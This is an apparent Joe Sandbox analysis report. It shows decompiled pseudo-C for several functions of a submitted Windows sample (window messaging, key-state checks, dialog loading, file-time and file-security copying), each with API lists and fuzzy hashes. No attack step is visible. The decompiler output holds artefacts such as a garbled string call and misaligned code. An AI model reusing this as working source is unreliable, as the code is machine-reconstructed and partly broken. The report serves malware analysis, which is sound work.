                                            						if(_t116 == 0) {
                                            							break;
                                            						}
                                            						__eflags = _t116 - _t198;
                                            						if(_t116 == _t198) {
                                            							L57:
                                            							__eflags = _t208 - 0x100;
                                            							if(_t208 < 0x100) {
                                            								L59:
                                            								__eflags = _t208 - 0x104;
                                            								if(_t208 < 0x104) {
                                            									L62:
                                            									_t116 = 0;
                                            									__eflags = 0;
                                            									L63:
                                            									__eflags =  *(_t198 + 0x25) & 0x00000004;
                                            									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
                                            										goto L78;
                                            									}
                                            									__eflags = _t116;
                                            									if(_t116 != 0) {
                                            										L77:
                                            										_t116 = E00414026(_t116);
                                            										goto L78;
                                            									}
                                            									__eflags = _t208 - 0x201;
                                            									if(_t208 == 0x201) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x203;
                                            									if(_t208 == 0x203) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x204;
                                            									if(_t208 == 0x204) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x206;
                                            									if(_t208 == 0x206) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x207;
                                            									if(_t208 == 0x207) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0x209;
                                            									if(_t208 == 0x209) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa1;
                                            									if(_t208 == 0xa1) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa3;
                                            									if(_t208 == 0xa3) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa4;
                                            									if(_t208 == 0xa4) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa6;
                                            									if(_t208 == 0xa6) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa7;
                                            									if(_t208 == 0xa7) {
                                            										goto L77;
                                            									}
                                            									__eflags = _t208 - 0xa9;
                                            									if(_t208 != 0xa9) {
                                            										goto L78;
                                            									}
                                            									goto L77;
                                            								}
                                            								__eflags = _t208 - 0x107;
                                            								if(_t208 > 0x107) {
                                            									goto L62;
                                            								}
                                            								L61:
                                            								_t116 = 1;
                                            								goto L63;
                                            							}
                                            							__eflags = _t208 - 0x108;
                                            							if(_t208 <= 0x108) {
                                            								goto L61;
                                            							}
                                            							goto L59;
                                            						}
                                            						__eflags =  *(_t116 + 0x24) & 0x00000401;
                                            						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
                                            							break;
                                            						}
                                            						_push(GetParent( *(_t116 + 0x1c)));
                                            					}
                                            					__eflags = _t116 - _t198;
                                            					if(_t116 != _t198) {
                                            						goto L78;
                                            					}
                                            					goto L57;
                                            				}
                                            			}






























                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00410E0A
                                            • GetKeyState.USER32(00000001), ref: 00410E57
                                            • GetKeyState.USER32(00000002), ref: 00410E64
                                            • GetKeyState.USER32(00000004), ref: 00410E71
                                            • GetParent.USER32(?), ref: 00410E92
                                            • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00410F6C
                                            • SendMessageA.USER32(?,00000408,00000000,?), ref: 00410FB0
                                            • SendMessageA.USER32(?,00000404,00000000,00000028), ref: 00410FC8
                                            • ScreenToClient.USER32 ref: 00410FE4
                                            • GetCursorPos.USER32(?), ref: 0041103B
                                            • SendMessageA.USER32(?,00000412,00000000,?), ref: 00411059
                                            • SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004110BB
                                            • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 004110DE
                                            • SendMessageA.USER32(?,00000411,00000001,00000028), ref: 004110FA
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041110D
                                            • SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 00411139
                                            • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00411187
                                            • GetParent.USER32(?), ref: 004111B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
                                            • String ID: ($($@
                                            • API String ID: 986702660-2846432479
                                            • Opcode ID: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
                                            • Instruction ID: 13d5465373c71cfe337dff1ba131fcf840a9d493356aa9c13fb6cf6503e8bb35
                                            • Opcode Fuzzy Hash: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
                                            • Instruction Fuzzy Hash: 00C1A671A00315ABDF249F94CC85BEEBB75AF08704F10412BEB15BB2E1D7B898C58B59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00412121(intOrPtr* __ecx) {
                                            				void* __esi;
                                            				signed int _t40;
                                            				struct HWND__* _t44;
                                            				signed int _t48;
                                            				signed char _t53;
                                            				struct HWND__* _t55;
                                            				struct HINSTANCE__* _t60;
                                            				void* _t62;
                                            				void* _t73;
                                            				intOrPtr* _t77;
                                            				void* _t79;
                                            				void* _t81;
                                            
                                            				E00406520(E00429CE8, _t79);
                                            				_t77 = __ecx;
                                            				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x18;
                                            				 *((intOrPtr*)(_t79 - 0x1c)) = __ecx;
                                            				_t73 =  *(__ecx + 0x44);
                                            				 *(_t79 - 0x18) =  *(__ecx + 0x48);
                                            				_t40 = E00424BFB();
                                            				_t60 =  *(_t40 + 0xc);
                                            				if( *(_t77 + 0x40) != 0) {
                                            					_t60 =  *(E00424BFB() + 0xc);
                                            					_t40 = LoadResource(_t60, FindResourceA(_t60,  *(_t77 + 0x40), 5));
                                            					_t73 = _t40;
                                            				}
                                            				if(_t73 != 0) {
                                            					_t40 = LockResource(_t73);
                                            					 *(_t79 - 0x18) = _t40;
                                            				}
                                            				if( *(_t79 - 0x18) != 0) {
                                            					 *(_t79 - 0x14) = E004120A5(_t77);
                                            					E00413C3E();
                                            					__eflags =  *(_t79 - 0x14);
                                            					 *(_t79 - 0x20) = 0;
                                            					if( *(_t79 - 0x14) != 0) {
                                            						_t55 = IsWindowEnabled( *(_t79 - 0x14));
                                            						__eflags = _t55;
                                            						if(_t55 != 0) {
                                            							EnableWindow( *(_t79 - 0x14), 0);
                                            							 *(_t79 - 0x20) = 1;
                                            						}
                                            					}
                                            					_push(_t77);
                                            					 *(_t79 - 4) = 0;
                                            					"VWh\rDB"();
                                            					_t44 = E00411E32(_t77,  *(_t79 - 0x18), E00413740(_t79,  *(_t79 - 0x14)), _t60);
                                            					__eflags = _t44;
                                            					if(_t44 != 0) {
                                            						__eflags =  *(_t77 + 0x24) & 0x00000010;
                                            						if(( *(_t77 + 0x24) & 0x00000010) != 0) {
                                            							_t62 = 4;
                                            							_t53 = E00416528(_t77);
                                            							__eflags = _t53 & 0x00000001;
                                            							if((_t53 & 0x00000001) != 0) {
                                            								_t62 = 5;
                                            							}
                                            							_push(_t62);
                                            							E00415F1B(_t77);
                                            						}
                                            						__eflags =  *(_t77 + 0x1c);
                                            						if( *(_t77 + 0x1c) != 0) {
                                            							E0041663D(_t77, 0, 0, 0, 0, 0, 0x97);
                                            						}
                                            					}
                                            					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                            					__eflags =  *(_t79 - 0x20);
                                            					if( *(_t79 - 0x20) != 0) {
                                            						EnableWindow( *(_t79 - 0x14), 1);
                                            					}
                                            					__eflags =  *(_t79 - 0x14);
                                            					if(__eflags != 0) {
                                            						__eflags = GetActiveWindow() -  *(_t77 + 0x1c);
                                            						if(__eflags == 0) {
                                            							SetActiveWindow( *(_t79 - 0x14));
                                            						}
                                            					}
                                            					 *((intOrPtr*)( *_t77 + 0x58))();
                                            					E004120DF(_t77, _t77, __eflags);
                                            					_t48 =  *(_t77 + 0x2c);
                                            				} else {
                                            					_t48 = _t40 | 0xffffffff;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
                                            				return _t48;
                                            			}
















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00412126
                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041215E
                                            • LoadResource.KERNEL32(?,00000000), ref: 00412166
                                              • Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63
                                            • LockResource.KERNEL32(?), ref: 00412173
                                            • IsWindowEnabled.USER32(?), ref: 004121A6
                                            • EnableWindow.USER32(?,00000000), ref: 004121B4
                                            • EnableWindow.USER32(?,00000001), ref: 00412242
                                            • GetActiveWindow.USER32 ref: 0041224D
                                            • SetActiveWindow.USER32(?), ref: 0041225B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                                            • String ID:
                                            • API String ID: 401145483-0
                                            • Opcode ID: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
                                            • Instruction ID: 29e84b16fa1c15ce6d6e5a6389cc251cef0e56d6ff14e1849cc81362d4330516
                                            • Opcode Fuzzy Hash: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
                                            • Instruction Fuzzy Hash: 0841C331A00604AFCB21AF65CA45AEFBBB5FF44715F10011FF502E2291CBB99D91CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00417B29() {
                                            				CHAR* _t29;
                                            				CHAR* _t36;
                                            				void* _t38;
                                            				CHAR* _t47;
                                            				void* _t53;
                                            
                                            				E00406520(E0042A77C, _t53);
                                            				_t47 =  *(_t53 + 8);
                                            				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
                                            					_t29 =  *0x436980; // 0x436994
                                            					 *(_t53 + 8) = _t29;
                                            					_push(_t53 + 8);
                                            					 *(_t53 - 4) = 0;
                                            					E00417BF9(_t53, _t47);
                                            					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
                                            						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
                                            							CharUpperA(_t47);
                                            						}
                                            						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
                                            							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
                                            							if(_t38 != 0xffffffff) {
                                            								FindClose(_t38);
                                            								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
                                            							}
                                            						}
                                            						_push(1);
                                            						_pop(0);
                                            					}
                                            					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                                            					E00416AEC(_t53 + 8);
                                            					_t36 = 0;
                                            				} else {
                                            					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
                                            					_t36 = 0;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                                            				return _t36;
                                            			}









                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00417B2E
                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00417B8F
                                            • CharUpperA.USER32(?), ref: 00417BA0
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00417BB6
                                            • FindClose.KERNEL32(00000000), ref: 00417BC2
                                            • lstrcpyA.KERNEL32(?,?), ref: 00417BD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                            • String ID:
                                            • API String ID: 304730633-0
                                            • Opcode ID: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
                                            • Instruction ID: d6ea0ce2269d815b5d4983ac84d4510317191ca485f23a24ef5020b763cd6ff7
                                            • Opcode Fuzzy Hash: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
                                            • Instruction Fuzzy Hash: 71215C71A04119ABCB209F61DC48EEF7F7CEF05768F008166F919E61A0D7349A46CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0041E95F(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr* _v20;
                                            				struct tagPOINT _v28;
                                            				intOrPtr _v36;
                                            				signed char _v65;
                                            				char _v72;
                                            				void* _t58;
                                            				void* _t60;
                                            				intOrPtr _t64;
                                            				intOrPtr _t67;
                                            				intOrPtr _t110;
                                            				intOrPtr _t111;
                                            				intOrPtr* _t113;
                                            
                                            				_t110 = _a4;
                                            				_t113 = __ecx;
                                            				if(E00414007(__ecx, _t110) != 0) {
                                            					L38:
                                            					_t58 = 1;
                                            					return _t58;
                                            				}
                                            				_t111 =  *((intOrPtr*)(_t110 + 4));
                                            				_v20 = E00404FFE(__ecx);
                                            				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
                                            					if(_t111 < 0x200 || _t111 > 0x209) {
                                            						if(_t111 < 0xa0 || _t111 > 0xa9) {
                                            							goto L30;
                                            						} else {
                                            							goto L8;
                                            						}
                                            					} else {
                                            						L8:
                                            						_v16 = E004249C4();
                                            						_t67 = _a4;
                                            						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
                                            						_v28.x =  *(_t67 + 0x14);
                                            						ScreenToClient( *(_t113 + 0x1c),  &_v28);
                                            						E00406330( &_v72, 0, 0x2c);
                                            						_v72 = 0x28;
                                            						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
                                            						if(_v36 != 0xffffffff) {
                                            							E004062E0(_v36);
                                            						}
                                            						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
                                            							_v12 = _v12 & 0x00000000;
                                            							if(_t111 != 0x201 && GetKeyState(1) < 0) {
                                            								_v8 =  *((intOrPtr*)(_v16 + 0x104));
                                            							}
                                            						} else {
                                            							_v12 = 1;
                                            						}
                                            						if(_v8 < 0 || _v12 != 0) {
                                            							if(GetKeyState(1) >= 0 || _v12 != 0) {
                                            								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
                                            								KillTimer( *(_t113 + 0x1c), 0xe001);
                                            							}
                                            							goto L29;
                                            						} else {
                                            							if(_t111 != 0x202) {
                                            								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
                                            									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
                                            								} else {
                                            									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
                                            										L29:
                                            										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
                                            										goto L30;
                                            									}
                                            									_push(0x12c);
                                            									_push(0xe000);
                                            									L20:
                                            									E0041E722(_t113);
                                            								}
                                            								goto L29;
                                            							}
                                            							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
                                            							_push(0xc8);
                                            							_push(0xe001);
                                            							goto L20;
                                            						}
                                            					}
                                            				} else {
                                            					L30:
                                            					_t60 = E00414DCC(_t113);
                                            					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
                                            						if(_v20 == 0) {
                                            							L36:
                                            							return E00415EEB(_a4);
                                            						} else {
                                            							goto L34;
                                            						}
                                            						while(1) {
                                            							L34:
                                            							_t112 = _v20;
                                            							_push(_a4);
                                            							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
                                            								goto L38;
                                            							}
                                            							_t64 = E00414C6C(_t112);
                                            							_v20 = _t64;
                                            							if(_t64 != 0) {
                                            								continue;
                                            							}
                                            							goto L36;
                                            						}
                                            						goto L38;
                                            					} else {
                                            						return 0;
                                            					}
                                            				}
                                            			}



















                                            APIs
                                              • Part of subcall function 00404FFE: GetParent.USER32(?), ref: 00405008
                                            • ScreenToClient.USER32 ref: 0041E9E9
                                            • GetKeyState.USER32(00000001), ref: 0041EA46
                                            • GetKeyState.USER32(00000001), ref: 0041EA98
                                            • GetKeyState.USER32(00000001), ref: 0041EACE
                                            • KillTimer.USER32(?,0000E001), ref: 0041EAF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: State$ClientKillParentScreenTimer
                                            • String ID: (
                                            • API String ID: 2757461879-3887548279
                                            • Opcode ID: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
                                            • Instruction ID: 933066e1b9ae1ffc9999b2effe157d6391a28475e321b0032f1d86925bea9953
                                            • Opcode Fuzzy Hash: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
                                            • Instruction Fuzzy Hash: 09518179A00205DBDF24DB96C488BEE7BB1AF44354F14006AED16A72D1C7B869C2CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E00418C88(void* __ecx) {
                                            				void* __esi;
                                            				void* _t60;
                                            				CHAR* _t83;
                                            				void* _t95;
                                            				struct _SECURITY_DESCRIPTOR* _t101;
                                            				signed int _t102;
                                            				void* _t120;
                                            				CHAR** _t124;
                                            				void* _t126;
                                            
                                            				E00406520(E00429FC8, _t126);
                                            				_t120 = __ecx;
                                            				_t124 = __ecx + 0x10;
                                            				E00416A77(_t124, _t124);
                                            				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E004182CC( *(_t126 + 8), _t126 - 0x150) != 0) {
                                            					_t83 =  *0x436980; // 0x436994
                                            					 *(_t126 - 0x10) = _t83;
                                            					_t102 = 0;
                                            					_push(_t126 - 0x10);
                                            					 *(_t126 - 4) = 0;
                                            					E00417BF9(_t126,  *(_t126 + 8));
                                            					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
                                            						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
                                            					}
                                            					_t91 =  *((intOrPtr*)(_t126 - 0x144));
                                            					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
                                            					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
                                            						_push(1);
                                            						_push( *(_t126 + 8));
                                            						_push(_t126 - 0x14);
                                            						_t95 = E00418BE2(_t136);
                                            						 *(_t126 - 4) = 1;
                                            						E00416B95(_t124, _t126, _t95);
                                            						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                                            						E00416AEC(_t126 - 0x14);
                                            					}
                                            					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
                                            					E00416AEC(_t126 - 0x10);
                                            				}
                                            				_t58 =  *_t124;
                                            				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E004177BD(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
                                            					E00416A77(_t124, _t124);
                                            					_t60 = E004177BD(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
                                            				} else {
                                            					E00416BE5(_t120 + 0xc,  *(_t126 + 8));
                                            					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
                                            						E0041837E(_t126 - 0x150, _t126 - 0x18);
                                            						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
                                            					}
                                            					 *(_t126 + 0xc) = 0;
                                            					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
                                            						_t101 = E004131DD( *(_t126 + 0xc));
                                            						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
                                            							SetFileSecurityA( *_t124, 4, _t101);
                                            						}
                                            						E00413206(_t101);
                                            					}
                                            					_t60 = 1;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
                                            				return _t60;
                                            			}












                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00418C8D
                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00418CF4
                                            • GetFileTime.KERNEL32(?,?,?,?,?), ref: 00418D87
                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 00418DB2
                                            • GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00418DCC
                                            • GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00418DEA
                                            • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00418DF5
                                              • Part of subcall function 00417BF9: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 00417C20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
                                            • String ID:
                                            • API String ID: 726943650-0
                                            • Opcode ID: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
                                            • Instruction ID: be22718d3dfdaed04fc9161a777cdf82254a032ef9ddc828293ac01cd1254a92
                                            • Opcode Fuzzy Hash: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
                                            • Instruction Fuzzy Hash: DD513BB2600209AFDF11EFA1DC85EEEBB7CFF04354F00802AF915A6191DB35DA958B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E00422488(void* __ecx, signed int _a4, long _a8) {
                                            				struct HWND__* _v8;
                                            				long _t24;
                                            				void* _t29;
                                            				int _t32;
                                            				struct HWND__* _t36;
                                            
                                            				_push(__ecx);
                                            				_t29 = __ecx;
                                            				if(GetKeyState(0x11) < 0) {
                                            					_push(8);
                                            					_pop(0);
                                            				}
                                            				if(GetKeyState(0x10) < 0) {
                                            					_push(4);
                                            					_pop(0);
                                            				}
                                            				_t36 = GetFocus();
                                            				_v8 = GetDesktopWindow();
                                            				if(_t36 != 0) {
                                            					_t32 = _a4 << 0x10;
                                            					do {
                                            						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                                            						_t36 = GetParent(_t36);
                                            					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                                            				} else {
                                            					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                            				}
                                            				return _t24;
                                            			}








                                            APIs
                                            • GetKeyState.USER32(00000011), ref: 00422499
                                            • GetKeyState.USER32(00000010), ref: 004224A9
                                            • GetFocus.USER32(?,?,?,00000098), ref: 004224B9
                                            • GetDesktopWindow.USER32 ref: 004224C1
                                            • SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5
                                            • SendMessageA.USER32(00000000,0000020A,?,?), ref: 00422504
                                            • GetParent.USER32(00000000), ref: 0042250D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageSendState$DesktopFocusParentWindow
                                            • String ID:
                                            • API String ID: 4150626516-0
                                            • Opcode ID: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
                                            • Instruction ID: 20f266b1a498cc3956224d16169f9dc1dc704df93882e012ad9005a8c3fefddb
                                            • Opcode Fuzzy Hash: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
                                            • Instruction Fuzzy Hash: A4110D32B00334BFEB502BA5AD48EAA7798EB14794F904137FE41D7250DBF49C4256E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E00422473(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
                                            				struct HWND__* _v8;
                                            				long _t33;
                                            				void* _t40;
                                            				int _t43;
                                            				struct HWND__* _t47;
                                            				void* _t49;
                                            
                                            				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
                                            				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
                                            				_push(_t49);
                                            				_push(0x98);
                                            				_push(__ebx);
                                            				_t40 = 0x98;
                                            				if(GetKeyState(0x11) < 0) {
                                            					_push(8);
                                            					_pop(0);
                                            				}
                                            				if(GetKeyState(0x10) < 0) {
                                            					_push(4);
                                            					_pop(0);
                                            				}
                                            				_t47 = GetFocus();
                                            				_v8 = GetDesktopWindow();
                                            				if(_t47 != 0) {
                                            					_t43 = _a4 << 0x10;
                                            					do {
                                            						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
                                            						_t47 = GetParent(_t47);
                                            					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
                                            				} else {
                                            					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                            				}
                                            				return _t33;
                                            			}









                                            APIs
                                            • GetKeyState.USER32(00000011), ref: 00422499
                                            • GetKeyState.USER32(00000010), ref: 004224A9
                                            • GetFocus.USER32(?,?,?,00000098), ref: 004224B9
                                            • GetDesktopWindow.USER32 ref: 004224C1
                                            • SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
